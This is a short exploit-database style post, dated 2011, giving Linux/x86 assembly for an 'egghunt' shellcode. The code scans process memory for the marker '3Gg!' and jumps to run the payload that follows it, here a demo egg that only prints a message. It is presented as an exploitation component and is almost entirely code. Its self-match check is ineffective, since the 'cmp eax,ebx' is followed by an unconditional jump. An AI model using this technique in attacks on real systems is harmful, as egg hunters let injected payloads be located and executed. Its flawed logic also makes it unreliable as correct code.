/*
Exploit Title: Linux/x86 egghunt shellcode
Date: 21-07-2011
Author: Ali Raheem
Tested on:
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/tkSONxY5 Code pad lets you execute code live check here for a live demostration
Thanks: Stealth- for testing and codepad.com for being so useful.
[ali@Ali-PC asm]$ cat egghunter.s
section .data
egg equ "3Gg!" ;this is the egg marker
section .text
global _start
_start:
mov eax, _start ;0x8048080 is a good safe starting point
_next:
inc eax
_isEgg:
cmp dword [eax-4],egg
jne _next
cmp eax,ebx
jmp eax
*/
section .data
msg db "We found the egg!",0ah,0dh
msg_len equ $-msg
egg equ "3Gg!"
section .text
global _start
;This simple egg will print msg if we find it
_egg:
db "3Gg!" ;Start your egg with this marker
mov eax,4
mov ebx,1
mov ecx,msg
mov edx,msg_len
int 80h
mov eax,1
int 80h
_start:
mov eax, 0x8048080
_next:
inc eax
_isEgg:
cmp dword [eax-4],egg ;is this our marker?
jne _next ;No? skip
cmp eax,ebx ;Make sure JNE is not true if we found our self
jmp eax ;Execute the egg